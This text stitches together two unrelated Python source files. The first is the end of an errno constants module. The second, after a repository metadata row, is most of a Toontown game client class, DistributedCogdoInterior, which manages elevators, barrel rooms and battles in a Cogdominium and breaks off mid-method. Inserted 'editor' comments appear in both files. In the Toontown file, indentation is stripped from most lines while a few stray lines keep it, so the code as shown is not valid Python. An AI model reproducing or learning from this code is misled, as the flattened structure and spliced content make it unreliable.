32: 'EPIPE', 33: 'EDOM', 34: 'ERANGE', 35: 'EDEADLOCK', 36: 'ENAMETOOLONG',
37: 'ENOLCK', 38: 'ENOSYS', 39: 'ENOTEMPTY', 40: 'ELOOP', 42: 'ENOMSG',
43: 'EIDRM', 44: 'ECHRNG', 45: 'EL2NSYNC', 46: 'EL3HLT', 47: 'EL3RST',
48: 'ELNRNG', 49: 'EUNATCH', 50: 'ENOCSI', 51: 'EL2HLT', 52: 'EBADE',
53: 'EBADR', 54: 'EXFULL', 55: 'ENOANO', 56: 'EBADRQC', 57: 'EBADSLT',
59: 'EBFONT', 60: 'ENOSTR', 61: 'ENODATA', 62: 'ETIME', 63: 'ENOSR',
64: 'ENONET', 65: 'ENOPKG', 66: 'EREMOTE', 67: 'ENOLINK', 68: 'EADV',
69: 'ESRMNT', 70: 'ECOMM', 71: 'EPROTO', 72: 'EMULTIHOP', 73: 'EDOTDOT',
74: 'EBADMSG', 75: 'EOVERFLOW', 76: 'ENOTUNIQ', 77: 'EBADFD', 78: 'EREMCHG',
79: 'ELIBACC', 80: 'ELIBBAD', 81: 'ELIBSCN', 82: 'ELIBMAX', 83: 'ELIBEXEC',
84: 'EILSEQ', 85: 'ERESTART', 86: 'ESTRPIPE', 87: 'EUSERS', 88: 'ENOTSOCK',
89: 'EDESTADDRREQ', 90: 'EMSGSIZE', 91: 'EPROTOTYPE', 92: 'ENOPROTOOPT',
93: 'EPROTONOSUPPORT', 94: 'ESOCKTNOSUPPORT', 95: 'ENOTSUP',
96: 'EPFNOSUPPORT', 97: 'EAFNOSUPPORT', 98: 'EADDRINUSE',
99: 'EADDRNOTAVAIL', 100: 'ENETDOWN', 101: 'ENETUNREACH', 102: 'ENETRESET',
103: 'ECONNABORTED', 104: 'ECONNRESET', 105: 'ENOBUFS', 106: 'EISCONN',
107: 'ENOTCONN', 108: 'ESHUTDOWN', 109: 'ETOOMANYREFS', 110: 'ETIMEDOUT',
111: 'ECONNREFUSED', 112: 'EHOSTDOWN', 113: 'EHOSTUNREACH', 114: 'EALREADY',
115: 'EINPROGRESS', 116: 'ESTALE', 117: 'EUCLEAN', 118: 'ENOTNAM',
119: 'ENAVAIL', 120: 'EISNAM', 121: 'EREMOTEIO', 122: 'EDQUOT',
123: 'ENOMEDIUM', 124: 'EMEDIUMTYPE', 125: 'ECANCELED', 126: 'ENOKEY',
127: 'EKEYEXPIRED', 128: 'EKEYREVOKED', 129: 'EKEYREJECTED',
130: 'EOWNERDEAD', 131: 'ENOTRECOVERABLE', 132: 'ERFKILL'}
EPERM=1
ENOENT=2
ESRCH=3
EINTR=4
EIO=5
ENXIO=6
E2BIG=7
ENOEXEC=8
EBADF=9
ECHILD=10
EAGAIN=11
ENOMEM=12
EACCES=13
EFAULT=14
ENOTBLK=15
EBUSY=16
EEXIST=17
EXDEV=18
ENODEV=19
ENOTDIR=20
EISDIR=21
EINVAL=22
ENFILE=23
EMFILE=24
ENOTTY=25
ETXTBSY=26
EFBIG=27
ENOSPC=28
ESPIPE=29
EROFS=30
EMLINK=31
EPIPE=32
EDOM=33
ERANGE=34
EDEADLOCK=35
ENAMETOOLONG=36
ENOLCK=37
ENOSYS=38
ENOTEMPTY=39
ELOOP=40
ENOMSG=42
EIDRM=43
ECHRNG=44
EL2NSYNC=45
EL3HLT=46
EL3RST=47
ELNRNG=48
EUNATCH=49
ENOCSI=50
EL2HLT=51
EBADE=52
EBADR=53
EXFULL=54
ENOANO=55
EBADRQC=56
EBADSLT=57
EBFONT=59
ENOSTR=60
ENODATA=61
ETIME=62
ENOSR=63
ENONET=64
ENOPKG=65
EREMOTE=66
ENOLINK=67
EADV=68
ESRMNT=69
ECOMM=70
EPROTO=71
EMULTIHOP=72
EDOTDOT=73
EBADMSG=74
EOVERFLOW=75
ENOTUNIQ=76
EBADFD=77
EREMCHG=78
ELIBACC=79
ELIBBAD=80
ELIBSCN=81
ELIBMAX=82
ELIBEXEC=83
EILSEQ=84
ERESTART=85
ESTRPIPE=86
EUSERS=87
ENOTSOCK=88
EDESTADDRREQ=89
EMSGSIZE=90
EPROTOTYPE=91
ENOPROTOOPT=92
EPROTONOSUPPORT=93
ESOCKTNOSUPPORT=94
ENOTSUP=95
EPFNOSUPPORT=96
EAFNOSUPPORT=97
EADDRINUSE=98
EADDRNOTAVAIL=99
ENETDOWN=100
ENETUNREACH=101
ENETRESET=102
ECONNABORTED=103
ECONNRESET=104
ENOBUFS=105
EISCONN=106
ENOTCONN=107
ESHUTDOWN=108
ETOOMANYREFS=109
ETIMEDOUT=110
ECONNREFUSED=111
EHOSTDOWN=112
EHOSTUNREACH=113
EALREADY=114
EINPROGRESS=115
ESTALE=116
EUCLEAN=117
ENOTNAM=118
ENAVAIL=119
EISNAM=120
EREMOTEIO=121
EDQUOT=122
ENOMEDIUM=123
EMEDIUMTYPE=124
ECANCELED=125
ENOKEY=126
EKEYEXPIRED=127
EKEYREVOKED=128
EKEYREJECTED=129
EOWNERDEAD=130
ENOTRECOVERABLE=131
ERFKILL=132
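# --- Illustrative example (editor addition, not part of the Brython stdlib) ---
# Typical use of this module; os.strerror output is platform-dependent and is
# assumed here to behave as on CPython.
def _describe(err=ENOENT):
    import os
    return '%s (%d): %s' % (errorcode.get(err, 'UNKNOWN'), err, os.strerror(err))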
| gpl-3.0 |
DedMemez/ODS-August-2017 | cogdominium/DistributedCogdoInterior.py | 1 | 35276 | # toontown.cogdominium.DistributedCogdoInterior
from panda3d.core import Lens, Light, Point3, VBase3, Vec3, Vec4, headsUp
import random
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from toontown.building.ElevatorConstants import *
from toontown.toon import NPCToons
from toontown.building import ElevatorUtils
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import ToontownBattleGlobals
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.distributed import DistributedObject
from direct.fsm import State
from direct.fsm.StatePush import StateVar, FunctionCall
from toontown.battle import BattleBase
from toontown.hood import ZoneUtil
from toontown.cogdominium.CogdoLayout import CogdoLayout
from toontown.cogdominium import CogdoGameConsts
from toontown.cogdominium import CogdoBarrelRoom, CogdoBarrelRoomConsts
from toontown.distributed import DelayDelete
from toontown.toonbase import TTLocalizer
from CogdoExecutiveSuiteMovies import CogdoExecutiveSuiteIntro
from CogdoBarrelRoomMovies import CogdoBarrelRoomIntro
from CogdoElevatorMovie import CogdoElevatorMovie
SUITE_DICT = {'s': 'tt_m_ara_crg_penthouse_sell',
'l': 'tt_m_ara_crg_penthouse_law',
'm': 'tt_m_ara_crg_penthouse_sell',
'c': 'tt_m_ara_crg_penthouse_sell'}
PAINTING_DICT = {'s': 'tt_m_ara_crg_paintingMoverShaker',
'l': 'tt_m_ara_crg_paintingLegalEagle',
'm': 'tt_m_ara_crg_paintingMoverShaker',
'c': 'tt_m_ara_crg_paintingMoverShaker'}
from otp.nametag.NametagConstants import *
class DistributedCogdoInterior(DistributedObject.DistributedObject):
id = 0
cageHeights = [11.36, 0.01]
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
self.toons = []
self.activeIntervals = {}
self.openSfx = loader.loadSfx('phase_5/audio/sfx/elevator_door_open.ogg')
self.closeSfx = loader.loadSfx('phase_5/audio/sfx/elevator_door_close.ogg')
self.suits = []
self.reserveSuits = []
self.joiningReserves = []
self.distBldgDoId = None
self._CogdoGameRepeat = config.GetBool('cogdo-game-repeat', 0)
self.currentFloor = -1
self.elevatorName = self.__uniqueName('elevator')
self.floorModel = None
self.elevatorOutOpen = 0
self.BottomFloor_SuitPositions = [Point3(0, 15, 0),
Point3(10, 20, 0),
Point3(-7, 24, 0),
Point3(-10, 0, 0)]
self.BottomFloor_SuitHs = [75,
170,
-91,
-44]
self.Cubicle_SuitPositions = [Point3(0, 18, 0),
Point3(10, 12, 0),
Point3(-9, 11, 0),
Point3(-3, 13, 0)]
self.Cubicle_SuitHs = [170,
56,
-52,
10]
self.BossOffice_SuitPositions = [Point3(0, 15, 0),
Point3(10, 20, 0),
Point3(-10, 6, 0),
Point3(-17, 30, 0)]
self.BossOffice_SuitHs = [170,
120,
12,
38]
self._wantBarrelRoom = config.GetBool('cogdo-want-barrel-room', 1)
self.barrelRoom = CogdoBarrelRoom.CogdoBarrelRoom()
self.brResults = [[], []]
self.barrelRoomIntroTrack = None
self.penthouseOutroTrack = None
self.penthouseOutroChatDoneTrack = None
self.penthouseIntroTrack = None
self.waitMusic = loader.loadMusic('phase_7/audio/bgm/encntr_toon_winning_indoor.ogg')
self.elevatorMusic = loader.loadMusic('phase_7/audio/bgm/tt_elevator.ogg')
self.fsm = ClassicFSM.ClassicFSM('DistributedCogdoInterior', [State.State('WaitForAllToonsInside', self.enterWaitForAllToonsInside, self.exitWaitForAllToonsInside, ['Elevator']),
State.State('Elevator', self.enterElevator, self.exitElevator, ['Game', 'BattleIntro', 'BarrelRoomIntro']),
State.State('Game', self.enterGame, self.exitGame, ['Resting',
'Failed',
'BattleIntro',
'BarrelRoomIntro',
'Elevator']),
State.State('BarrelRoomIntro', self.enterBarrelRoomIntro, self.exitBarrelRoomIntro, ['CollectBarrels', 'Off']),
State.State('CollectBarrels', self.enterCollectBarrels, self.exitCollectBarrels, ['BarrelRoomReward', 'Off']),
State.State('BarrelRoomReward', self.enterBarrelRoomReward, self.exitBarrelRoomReward, ['Battle',
'ReservesJoining',
'BattleIntro',
'Off']),
State.State('BattleIntro', self.enterBattleIntro, self.exitBattleIntro, ['Battle', 'ReservesJoining', 'Off']),
State.State('Battle', self.enterBattle, self.exitBattle, ['Resting', 'Reward', 'ReservesJoining']),
State.State('ReservesJoining', self.enterReservesJoining, self.exitReservesJoining, ['Battle']),
State.State('Resting', self.enterResting, self.exitResting, ['Elevator']),
State.State('Reward', self.enterReward, self.exitReward, ['Off']),
State.State('Failed', self.enterFailed, self.exitFailed, ['Off']),
State.State('Off', self.enterOff, self.exitOff, ['Elevator', 'WaitForAllToonsInside', 'Battle'])], 'Off', 'Off')
self.fsm.enterInitialState()
self._haveEntranceElevator = StateVar(False)
self._stashEntranceElevator = StateVar(False)
self._stashEntranceElevatorFC = FunctionCall(self._doStashEntranceElevator, self._haveEntranceElevator, self._stashEntranceElevator)
self._entranceElevCallbacks = []
self._doEntranceElevCallbacksFC = FunctionCall(self._doEntranceElevCallbacks, self._haveEntranceElevator)
self.cage = None
self.shopOwnerNpcId = None
self.shopOwnerNpc = None
self._movie = None
self.SOSToonName = None
self.FOType = None
return
def setShopOwnerNpcId(self, npcId):
self.shopOwnerNpcId = npcId
def setSOSNpcId(self, npcId):
self.SOSToonName = NPCToons.getNPCName(npcId)
def setFOType(self, typeId):
self.FOType = chr(typeId)
def getFOType(self):
return self.FOType
def __uniqueName(self, name):
DistributedCogdoInterior.id += 1
return name + '%d' % DistributedCogdoInterior.id
def generate(self):
DistributedObject.DistributedObject.generate(self)
self.announceGenerateName = self.uniqueName('generate')
self.accept(self.announceGenerateName, self.handleAnnounceGenerate)
self.elevatorModelIn = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_csa_elevatorB')
self.leftDoorIn = self.elevatorModelIn.find('**/left_door')
self.rightDoorIn = self.elevatorModelIn.find('**/right_door')
self.elevatorModelOut = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_csa_elevator')
self.leftDoorOut = self.elevatorModelOut.find('**/left_door')
self.rightDoorOut = self.elevatorModelOut.find('**/right_door')
def __makeShopOwnerNpc(self):
if self.shopOwnerNpc:
return
self.shopOwnerNpc = NPCToons.createLocalNPC(self.shopOwnerNpcId)
if not self.shopOwnerNpc:
self.notify.warning('No shopkeeper in this cogdominium.')
random.seed(self.doId)
shopkeeper = random.choice(NPCToons.NPCToonNames.keys())
self.shopOwnerNpc = NPCToons.createLocalNPC(shopkeeper)
self.shopOwnerNpc.addActive()
self.shopOwnerNpc.reparentTo(self.cage)
self.shopOwnerNpc.setPosHpr(0, -2, 0, 180, 0, 0)
self.shopOwnerNpc.loop('neutral')
def setElevatorLights(self, elevatorModel):
npc = elevatorModel.findAllMatches('**/floor_light_?;+s')
for i in xrange(npc.getNumPaths()):
np = npc.getPath(i)
np.setDepthOffset(120)
floor = int(np.getName()[-1:]) - 1
if floor == self.currentFloor:
np.setColor(LIGHT_ON_COLOR)
elif floor < self.layout.getNumGameFloors() + (1 if self.FOType != 's' else 0):
if self.isBossFloor(self.currentFloor):
np.setColor(LIGHT_ON_COLOR)
else:
np.setColor(LIGHT_OFF_COLOR)
else:
np.hide()
def startAlertElevatorLightIval(self, elevatorModel):
light = elevatorModel.find('**/floor_light_%s' % (self.currentFloor + 1))
track = Sequence(Func(light.setColor, Vec4(1.0, 0.6, 0.6, 1.0)), Wait(0.9), Func(light.setColor, LIGHT_ON_COLOR), Wait(0.9))
self.activeIntervals['alertElevatorLight'] = track
track.loop()
def stopAlertElevatorLightIval(self, elevatorModel):
self.__finishInterval('alertElevatorLight')
self.setElevatorLights(elevatorModel)
def handleAnnounceGenerate(self, obj):
self.ignore(self.announceGenerateName)
self.cageDoorSfx = loader.loadSfx('phase_5/audio/sfx/CHQ_SOS_cage_door.ogg')
self.cageLowerSfx = loader.loadSfx('phase_5/audio/sfx/CHQ_SOS_cage_lower.ogg')
self.sendUpdate('setAvatarJoined', [])
def disable(self):
self.fsm.requestFinalState()
self.__cleanupIntervals()
self.ignoreAll()
self.__cleanup()
self.__cleanupShopOwnerNpc()
self.__cleanupPenthouseIntro()
DistributedObject.DistributedObject.disable(self)
def __cleanupShopOwnerNpc(self):
if self.shopOwnerNpc:
self.shopOwnerNpc.removeActive()
self.shopOwnerNpc.delete()
self.shopOwnerNpc = None
return
def __cleanupPenthouseIntro(self):
if hasattr(self, '_movie') and self._movie:
self._movie.unload()
self._movie = None
return
def delete(self):
self._stashEntranceElevatorFC.destroy()
self._doEntranceElevCallbacksFC.destroy()
self._haveEntranceElevator.destroy()
self._stashEntranceElevator.destroy()
self._entranceElevCallbacks = None
del self.waitMusic
del self.elevatorMusic
del self.openSfx
del self.closeSfx
del self.fsm
DistributedObject.DistributedObject.delete(self)
return
def isBossFloor(self, floorNum):
        return self.layout.hasBossBattle() and self.layout.getBossBattleFloor() == floorNum
def __cleanup(self):
self.toons = []
self.suits = []
self.reserveSuits = []
self.joiningReserves = []
if self.elevatorModelIn != None:
self.elevatorModelIn.removeNode()
if self.elevatorModelOut != None:
self.elevatorModelOut.removeNode()
if self.floorModel != None:
self.floorModel.removeNode()
if self.cage != None:
self.cage = None
if self.barrelRoom != None:
self.barrelRoom.destroy()
self.barrelRoom = None
self.leftDoorIn = None
self.rightDoorIn = None
self.leftDoorOut = None
self.rightDoorOut = None
return
def __addToon(self, toon):
self.accept(toon.uniqueName('disable'), self.__handleUnexpectedExit, extraArgs=[toon])
def __handleUnexpectedExit(self, toon):
self.notify.warning('handleUnexpectedExit() - toon: %d' % toon.doId)
self.__removeToon(toon, unexpected=1)
def __removeToon(self, toon, unexpected = 0):
if self.toons.count(toon) == 1:
self.toons.remove(toon)
self.ignore(toon.uniqueName('disable'))
def __finishInterval(self, name):
if name in self.activeIntervals:
interval = self.activeIntervals[name]
if interval.isPlaying():
interval.finish()
def __cleanupIntervals(self):
for interval in self.activeIntervals.values():
interval.finish()
self.activeIntervals = {}
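    # --- Editor's note (illustrative, not original code) ---
    # The helpers above implement a simple interval registry: every
    # Sequence/Parallel this interior starts is stored under a name in
    # self.activeIntervals, so teardown can finish any still-playing track
    # deterministically. The pattern, with a hypothetical name:
    #
    #     track = Sequence(Wait(1.0), Func(callback))
    #     self.activeIntervals['my-track'] = track
    #     track.start()
    #     ...
    #     self.__finishInterval('my-track')  # safe even if already finished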
def __closeInElevator(self):
self.leftDoorIn.setPos(3.5, 0, 0)
self.rightDoorIn.setPos(-3.5, 0, 0)
def getZoneId(self):
return self.zoneId
def setZoneId(self, zoneId):
self.zoneId = zoneId
def getExtZoneId(self):
return self.extZoneId
def setExtZoneId(self, extZoneId):
self.extZoneId = extZoneId
def getDistBldgDoId(self):
return self.distBldgDoId
def setDistBldgDoId(self, distBldgDoId):
self.distBldgDoId = distBldgDoId
def setNumFloors(self, numFloors):
self.layout = CogdoLayout(numFloors)
def getToonIds(self):
toonIds = []
for toon in self.toons:
toonIds.append(toon.doId)
return toonIds
def setToons(self, toonIds, hack):
self.toonIds = toonIds
oldtoons = self.toons
self.toons = []
for toonId in toonIds:
if toonId != 0:
if toonId in self.cr.doId2do:
toon = self.cr.doId2do[toonId]
toon.stopSmooth()
self.toons.append(toon)
if oldtoons.count(toon) == 0:
self.__addToon(toon)
else:
self.notify.warning('setToons() - no toon: %d' % toonId)
for toon in oldtoons:
if self.toons.count(toon) == 0:
self.__removeToon(toon)
def setSuits(self, suitIds, reserveIds, values):
oldsuits = self.suits
self.suits = []
self.joiningReserves = []
for suitId in suitIds:
if suitId in self.cr.doId2do:
suit = self.cr.doId2do[suitId]
self.suits.append(suit)
suit.fsm.request('Battle')
suit.buildingSuit = 1
suit.reparentTo(render)
if oldsuits.count(suit) == 0:
self.joiningReserves.append(suit)
if 'Elevator' in repr(self.fsm):
pos, h = BattleBase.BattleBase.suitPoints[len(suitIds) - 1][suitIds.index(suitId)]
suit.setPos(pos)
suit.setH(h)
else:
self.notify.warning('setSuits() - no suit: %d' % suitId)
self.reserveSuits = []
for index in xrange(len(reserveIds)):
suitId = reserveIds[index]
if suitId in self.cr.doId2do:
suit = self.cr.doId2do[suitId]
self.reserveSuits.append((suit, values[index]))
else:
self.notify.warning('setSuits() - no suit: %d' % suitId)
if len(self.joiningReserves) > 0:
self.fsm.request('ReservesJoining')
def setState(self, state, timestamp):
self.fsm.request(state, [globalClockDelta.localElapsedTime(timestamp)])
def stashElevatorIn(self, stash = True):
self._stashEntranceElevator.set(stash)
def getEntranceElevator(self, callback):
if self._haveEntranceElevator.get():
callback(self.elevIn)
else:
self._entranceElevCallbacks.append(callback)
def _doEntranceElevCallbacks(self, haveElev):
if haveElev:
while len(self._entranceElevCallbacks):
cbs = self._entranceElevCallbacks[:]
self._entranceElevCallbacks = []
for callback in cbs:
callback(self.elevIn)
def _doStashEntranceElevator(self, haveElev, doStash):
if haveElev:
if doStash:
self.elevIn.stash()
else:
self.elevIn.unstash()
def d_elevatorDone(self):
self.sendUpdate('elevatorDone', [])
def d_reserveJoinDone(self):
self.sendUpdate('reserveJoinDone', [])
def enterOff(self, ts = 0):
messenger.send('sellbotFieldOfficeChanged', [False])
def exitOff(self):
return None
def enterWaitForAllToonsInside(self, ts = 0):
base.transitions.fadeOut(0)
def exitWaitForAllToonsInside(self):
return None
def enterGame(self, ts = 0):
base.cr.forbidCheesyEffects(1)
def exitGame(self):
base.cr.forbidCheesyEffects(0)
def __playElevator(self, ts, name, callback):
SuitHs = []
SuitPositions = []
if self.floorModel:
self.floorModel.removeNode()
self.floorModel = None
if self.cage:
self.cage = None
if self.currentFloor == 0:
SuitHs = self.BottomFloor_SuitHs
SuitPositions = self.BottomFloor_SuitPositions
if self.isBossFloor(self.currentFloor):
self.notify.info('__playElevator: currentFloor %s is boss' % self.currentFloor)
self.barrelRoom.unload()
if self.FOType:
penthouseName = SUITE_DICT.get(self.FOType)
                self.floorModel = loader.loadModel('phase_5/models/cogdominium/%s' % penthouseName)
self.cage = self.floorModel.find('**/cage')
pos = self.cage.getPos()
self.cagePos = []
for height in self.cageHeights:
self.cagePos.append(Point3(pos[0], pos[1], height))
self.cageDoor = self.floorModel.find('**/cage_door')
self.cageDoor.wrtReparentTo(self.cage)
if self.FOType:
paintingModelName = PAINTING_DICT.get(self.FOType)
for i in xrange(4):
paintingModel = loader.loadModel('phase_5/models/cogdominium/%s' % paintingModelName)
loc = self.floorModel.find('**/loc_painting%d' % (i + 1))
paintingModel.reparentTo(loc)
if not self.floorModel.find('**/trophyCase').isEmpty():
for i in xrange(4):
goldEmblem = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_goldTrophy')
loc = self.floorModel.find('**/gold_0%d' % (i + 1))
goldEmblem.reparentTo(loc)
for i in xrange(20):
silverEmblem = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_silverTrophy')
loc = self.floorModel.find('**/silver_0%d' % (i + 1))
silverEmblem.reparentTo(loc)
SuitHs = self.BossOffice_SuitHs
SuitPositions = self.BossOffice_SuitPositions
self.__makeShopOwnerNpc()
else:
if self._wantBarrelRoom:
self.barrelRoom.load()
self.barrelRoom.hide()
SuitHs = self.Cubicle_SuitHs
SuitPositions = self.Cubicle_SuitPositions
if self.floorModel:
self.floorModel.reparentTo(render)
if self.isBossFloor(self.currentFloor):
self.notify.info('Load boss_suit_office')
elevIn = self.floorModel.find(CogdoGameConsts.PenthouseElevatorInPath).copyTo(render)
elevOut = self.floorModel.find(CogdoGameConsts.PenthouseElevatorOutPath)
frame = self.elevatorModelOut.find('**/frame')
if not frame.isEmpty():
frame.hide()
frame = self.elevatorModelIn.find('**/frame')
if not frame.isEmpty():
frame.hide()
self.elevatorModelOut.reparentTo(elevOut)
self.elevatorModelOut.setY(0)
else:
elevIn = self.floorModel.find('**/elevator-in')
elevOut = self.floorModel.find('**/elevator-out')
elif self._wantBarrelRoom and self.barrelRoom.isLoaded() and self.currentFloor == 2 and self.FOType == 'l':
elevIn = self.barrelRoom.model.find(CogdoBarrelRoomConsts.BarrelRoomElevatorInPath)
elevOut = self.barrelRoom.model.find(CogdoBarrelRoomConsts.BarrelRoomElevatorOutPath)
y = elevOut.getY(render)
elevOut = elevOut.copyTo(render)
elevOut.setY(render, y - 0.75)
else:
floorModel = loader.loadModel('phase_7/models/modules/boss_suit_office')
elevIn = floorModel.find('**/elevator-in').copyTo(render)
elevOut = floorModel.find('**/elevator-out').copyTo(render)
floorModel.removeNode()
self.elevIn = elevIn
self.elevOut = elevOut
self._haveEntranceElevator.set(True)
for index in xrange(len(self.suits)):
if not self.suits[index].isEmpty():
self.suits[index].setPos(SuitPositions[index])
if len(self.suits) > 2:
self.suits[index].setH(SuitHs[index])
else:
self.suits[index].setH(170)
self.suits[index].loop('neutral')
for toon in self.toons:
toon.reparentTo(self.elevatorModelIn)
index = self.toonIds.index(toon.doId)
toon.setPos(ElevatorPoints[index][0], ElevatorPoints[index][1], ElevatorPoints[index][2])
toon.setHpr(180, 0, 0)
toon.loop('neutral')
self.elevatorModelIn.reparentTo(elevIn)
self.leftDoorIn.setPos(3.5, 0, 0)
self.rightDoorIn.setPos(-3.5, 0, 0)
camera.reparentTo(self.elevatorModelIn)
camera.setH(180)
camera.setP(0)
camera.setPos(0, 14, 4)
base.playMusic(self.elevatorMusic, looping=1, volume=0.8)
track = Sequence(Func(base.transitions.noTransitions), ElevatorUtils.getRideElevatorInterval(ELEVATOR_NORMAL), ElevatorUtils.getOpenInterval(self, self.leftDoorIn, self.rightDoorIn, self.openSfx, None, type=ELEVATOR_NORMAL), Func(camera.wrtReparentTo, render))
for toon in self.toons:
track.append(Func(toon.wrtReparentTo, render))
track.append(Func(callback))
track.start(ts)
self.activeIntervals[name] = track
return
def enterElevator(self, ts = 0):
if not self._CogdoGameRepeat:
self.currentFloor += 1
self.cr.playGame.getPlace().currentFloor = self.currentFloor
self.setElevatorLights(self.elevatorModelIn)
self.setElevatorLights(self.elevatorModelOut)
if not self.isBossFloor(self.currentFloor):
self.elevatorModelOut.detachNode()
messenger.send('sellbotFieldOfficeChanged', [True])
elif self.FOType == 's':
self._movie = CogdoElevatorMovie()
self._movie.load()
self._movie.play()
self.__playElevator(ts, self.elevatorName, self.__handleElevatorDone)
def __handleElevatorDone(self):
self.d_elevatorDone()
def exitElevator(self):
self.elevatorMusic.stop()
if self._movie:
self._movie.end()
self.__cleanupPenthouseIntro()
self.__finishInterval(self.elevatorName)
def __setupBarrelRoom(self):
self.currentFloor += 1
base.transitions.irisOut(0.0)
self.elevatorModelOut.setY(-12)
self.elevatorModelIn.reparentTo(self.barrelRoom.model.find(CogdoBarrelRoomConsts.BarrelRoomElevatorInPath))
self.leftDoorIn.setPos(3.5, 0, 0)
self.rightDoorIn.setPos(-3.5, 0, 0)
self._showExitElevator()
self.barrelRoom.show()
self.barrelRoom.placeToonsAtEntrance(self.toons)
self.setElevatorLights(self.elevatorModelOut)
def barrelRoomIntroDone(self):
self.sendUpdate('toonBarrelRoomIntroDone', [])
def enterBarrelRoomIntro(self, ts = 0):
if not self.isBossFloor(self.currentFloor):
if self._wantBarrelRoom:
self.__setupBarrelRoom()
self.barrelRoomIntroTrack, trackName = self.barrelRoom.getIntroInterval()
self.barrelRoomIntroDoneEvent = trackName
self.accept(self.barrelRoomIntroDoneEvent, self.barrelRoomIntroDone)
self.activeIntervals[trackName] = self.barrelRoomIntroTrack
self.barrelRoomIntroTrack.start(ts)
self._movie = CogdoBarrelRoomIntro()
self._movie.load()
self._movie.play()
else:
self._showExitElevator()
def exitBarrelRoomIntro(self):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
self.ignore(self.barrelRoomIntroDoneEvent)
if self.barrelRoomIntroTrack:
self.barrelRoomIntroTrack.finish()
DelayDelete.cleanupDelayDeletes(self.barrelRoomIntroTrack)
self.barrelRoomIntroTrack = None
return
def __handleLocalToonLeftBarrelRoom(self):
self.notify.info('Local toon teleported out of barrel room.')
self.sendUpdate('toonLeftBarrelRoom', [])
self.barrelRoom.deactivate()
def enterCollectBarrels(self, ts = 0):
if not self.isBossFloor(self.currentFloor):
if self._wantBarrelRoom:
self.acceptOnce('localToonLeft', self.__handleLocalToonLeftBarrelRoom)
self.barrelRoom.activate()
base.playMusic(self.waitMusic, looping=1, volume=0.7)
def exitCollectBarrels(self):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
self.ignore('localToonLeft')
self.barrelRoom.deactivate()
self.waitMusic.stop()
def __brRewardDone(self, task = None):
self.notify.info('Toon finished watching the barrel room reward.')
self.sendUpdate('toonBarrelRoomRewardDone', [])
self.fsm.request('Battle')
def enterBarrelRoomReward(self, ts = 0):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
base.cr.playGame.getPlace().fsm.request('stopped')
self.startAlertElevatorLightIval(self.elevatorModelOut)
track, trackName = self.barrelRoom.showRewardUi(callback=self.__brRewardDone)
self.activeIntervals[trackName] = track
track.start()
self.barrelRoom.placeToonsNearBattle(self.toons)
def exitBarrelRoomReward(self):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
base.cr.playGame.getPlace().fsm.request('walk')
self.stopAlertElevatorLightIval(self.elevatorModelOut)
self.barrelRoom.hideRewardUi()
def enterBattleIntro(self, ts = 0):
self._movie = CogdoExecutiveSuiteIntro(self.shopOwnerNpc)
self._movie.load()
self._movie.play()
def exitBattleIntro(self):
self._movie.end()
self.__cleanupPenthouseIntro()
def _showExitElevator(self):
self.elevatorModelOut.reparentTo(self.elevOut)
self.leftDoorOut.setPos(3.5, 0, 0)
self.rightDoorOut.setPos(-3.5, 0, 0)
def __playCloseElevatorOut(self, name):
track = Sequence(Wait(SUIT_LEAVE_ELEVATOR_TIME + 4), Parallel(SoundInterval(self.closeSfx), LerpPosInterval(self.leftDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], ElevatorUtils.getLeftClosePoint(ELEVATOR_NORMAL), startPos=Point3(0, 0, 0), blendType='easeOut'), LerpPosInterval(self.rightDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], ElevatorUtils.getRightClosePoint(ELEVATOR_NORMAL), startPos=Point3(0, 0, 0), blendType='easeOut')))
track.start()
self.activeIntervals[name] = track
def enterBattle(self, ts = 0):
if self.elevatorOutOpen:
try:
self.__playCloseElevatorOut(self.uniqueName('close-out-elevator'))
except:
pass
camera.setPos(0, -15, 4)
camera.headsUp(self.elevatorModelOut)
def exitBattle(self):
if self.elevatorOutOpen:
try:
self.__finishInterval(self.uniqueName('close-out-elevator'))
except:
pass
self.elevatorOutOpen = 0
def __playReservesJoining(self, ts, name, callback):
try:
for i, suit in enumerate(self.joiningReserves):
suit.reparentTo(render)
suit.setPos(self.elevatorModelOut, Point3(ElevatorPoints[i][0], ElevatorPoints[i][1], ElevatorPoints[i][2]))
suit.setH(180)
suit.loop('neutral')
track = Sequence(Func(camera.wrtReparentTo, self.elevatorModelOut), Func(camera.setPos, Point3(0, -8, 2)), Func(camera.setHpr, Vec3(0, 10, 0)), Parallel(SoundInterval(self.openSfx), LerpPosInterval(self.leftDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], Point3(0, 0, 0), startPos=ElevatorUtils.getLeftClosePoint(ELEVATOR_NORMAL), blendType='easeOut'), LerpPosInterval(self.rightDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], Point3(0, 0, 0), startPos=ElevatorUtils.getRightClosePoint(ELEVATOR_NORMAL), blendType='easeOut')), Wait(SUIT_HOLD_ELEVATOR_TIME), Func(camera.wrtReparentTo, render), Func(callback))
track.start(ts)
if len(self.suits) - len(self.joiningReserves) <= 0:
self.elevatorOutOpen = 1
self.activeIntervals[name] = track
except:
callback()
def enterReservesJoining(self, ts = 0):
self.__playReservesJoining(ts, self.uniqueName('reserves-joining'), self.__handleReserveJoinDone)
def __handleReserveJoinDone(self):
self.joiningReserves = []
self.d_reserveJoinDone()
def exitReservesJoining(self):
self.__finishInterval(self.uniqueName('reserves-joining'))
def enterResting(self, ts = 0):
self._showExitElevator()
self._setAvPosFDC = FrameDelayedCall('setAvPos', self._setAvPosToExit)
if self._wantBarrelRoom:
self.barrelRoom.showBattleAreaLight(True)
base.playMusic(self.waitMusic, looping=1, volume=0.7)
self.__closeInElevator()
self._haveEntranceElevator.set(False)
self._stashEntranceElevator.set(False)
def _setAvPosToExit(self):
